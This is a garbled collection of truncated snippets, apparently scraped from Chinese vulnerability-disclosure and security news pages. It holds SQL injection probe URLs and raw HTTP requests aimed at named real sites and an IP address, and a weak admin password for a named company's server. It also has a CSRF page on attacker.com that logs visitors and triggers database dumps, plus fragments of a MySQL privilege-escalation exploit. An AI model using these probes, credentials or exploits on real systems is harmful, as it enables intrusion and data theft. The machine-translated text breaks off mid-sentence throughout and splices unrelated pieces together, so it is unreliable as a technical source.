The SQL injection vulnerability exists in online community forums. In severe cases, you can obtain host and database information. Administrators should fix the problem quickly to avoid host security threats.
Detailed description:
Http://club.she.tom.com/users/userinfo.php? Username = qiaofeiyu 'and '1' = '1
Http://club.she.tom.com/users/userinfo.php? Username = qiaofeiyu 'or '1' = '2
Http://club.she.to
SQL injection vulnerability on a platform of erie group leaked 587 database data (a large number of APP databases)
Gift
Detailed description:
http://219.238.206.50:8001/
Dealer Business System SQL Injection
GET /public/login/login1.asp?USERID={1B1123E1-B310-4113-1B5A-213312284BA6} HTTP/1.1
Pragma: no-cache
Referer: http://219.238.206.50:8001/enterprise/list.asp?type=3
Acunetix-Aspect: enabled
Acunetix-Aspect-Pass
Tracing the SQL Server database server login process shows that the password calculation is very fragile. The SQL Server password weakness shows up in two aspects:
1. Password encryption algorithm for network login
2. Password encryption algorithm for database storage.
Each is described separately below:
1. Passw
YYCMS music program v4.0 VIP edition, just read the database file conn.asp file where the database address is
YYCMS_Data/#67tingdata.asa. At first, I thought this was the default database. Later I checked the database file and found that the database
Yes/YYCMS_Data/# us
CNET science and Information Network February 5 International Report: according to software evaluation company Coverity Friday (January 4), through an analysis of the source code of MySQL, the open source database used by many websites, found that its vulnerabilities than other commercial database code loopholes.
According to Coverity's report, Coverit
Release date:
Updated on:
Affected Systems:
Sourceforge sqlitemanager 1.2.4
Description:
Bugtraq id: 57560
SQLiteManager is a multilingual Web tool for managing SQLite databases.
SQLiteManager 1.2.4 and other versions have a remote PHP code injection vulnerability. Attackers can exploit this vulnerability to execute arbitrary PHP co
FengCMS CSRF vulnerability can cause database dumping
Important functions cannot be detached due to lack of CSRF token verification
Detailed description:
The data backup function in the background management does not undergo CSRF token verification. The attacker made the following csrf.php and put it under attacker.com:
file_put_contents("test.txt", " IP:".$_SERVER["REMOTE_ADDR"], FILE_APPEND); file_put_con
Today, I found a vulnerability like this. I searched the internet for a long time and did not find any exploitation methods. So I found the vulnerability and finally found it ..MMHTTPDB. php:If (extension_loaded ("mbstring ")){$ AcceptCharsetHeader = "Accept-Charset:". mb_internal_encoding ();Header ($ acceptCharsetHeader );$ Head = "Echo ($ head );}// Build connection object// If ($ connType = "MYSQL ")If
1. A station weak password + arbitrary upload caused by shell address is located in: http://fota.suning.com weak password: Admin: Administrator arbitrary upload vulnerability is located in the "Modify version" and "upgrade package query" Page uploaded after Shell 2. suning Enterprise Office Platform any file cross-disk download address is located in: http://ewp.suning.com.cn/app/plugins/download.jsp Path can customize any file drive letter. Download T
The SQL injection vulnerability in the main site of hillstone network affects database security.
After seeing your recruitment information, I tested it with curiosity ···
POST Data Packet:
POST /pub/iNGFWtest/register.php HTTP/1.1
Content-Length: 552
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://www.hillstonenet.com.cn:80/
Cookie: lc8_sid=wzNkuS; PHPSESSID=tnt4a
Description:
Php-nuke is a popular web site creation and management tool that can use many database systems as a backend, such as MySQL, PostgreSQL, mSQL, InterBase, Sybase, and so on.
An input validation vulnerability exists in the implementation of Php-nuke's Your_account module, which a remote attacker could exploit to carry out a SQL injection attack against the server program.
Php-nuke's Your_account modu
Tracking the logon process of the SQLSERVER database server finds that password computing is very fragile. The password of the SQLSERVER database is vulnerable in two aspects: 1. Password Encryption Algorithm for network login 2. password encryption for database
Brief description: due to a file inclusion vulnerability, you can bypass the background permission restriction and enter some pages.
Detailed description:
$controller = ABSPATH.'/content/'.$params['model'].'/index.php';
// die($controller);
// Load the call tag
if (file_exists(ABSPATH.'/content/index/common_call_label.php')) require_once(ABSPATH.'/content/index/common_call_label.php');
// var_dump($controller);
if (file_exists($controller))
On the 18th local time, Oracle released its July security update, which repairs 65 software flaws, including a number of serious cross-product issues.
The fixes cover many serious weaknesses. Darius Wiles, Oracle's senior manager responsible for security warnings, said 27 of the 65 flaws could be exploited by anonymous remote attackers.
Oracle does not recommend any alternative and only urges customers to repair their systems as soon as possible. "We fix flaws in a serious order," Wiles said. Critica
This morning I was idle and bored when a friend sent over the background management password of a website. He asked me to take a look for him. I said, you have got into the backstage; you can use the backup database feature to get a webshell. He said the backstage has the option of data backup, but it doesn't work.
There are options for backing up, but clicking them gives an error! The administrator should have renamed the file, or the location has changed. You can't back
Let's make up the words: Kingsoft has done it again. The vulnerability was released on Seclist in December 1. The author tested successfully On Debian Lenny (mysql-5.0.51a) and OpenSuSE 11.4 (5.1.53-log), and added a MySQL Administrator account after successful code execution. Use DBI (); $ | = 1; = for comment MySQL privilege elevation ExploitThis exploit adds a new admin user. by Kingdom Tested on www.2cto.com * Debian Lenny (mysql-5.0.51a) * OpenSu
Dahan JCMS can directly read the database configuration file. Because the file path is not filtered during file reading, this may cause database leakage or getshell. Because the code that reads the xml file does not filter the passed parameters, the flowcode parameter is controllable. The configuration file address is WEB-INF/config/dbconfig.xml; since the file suffix is controlled, only xml files can be read http://netcenter.cau.ed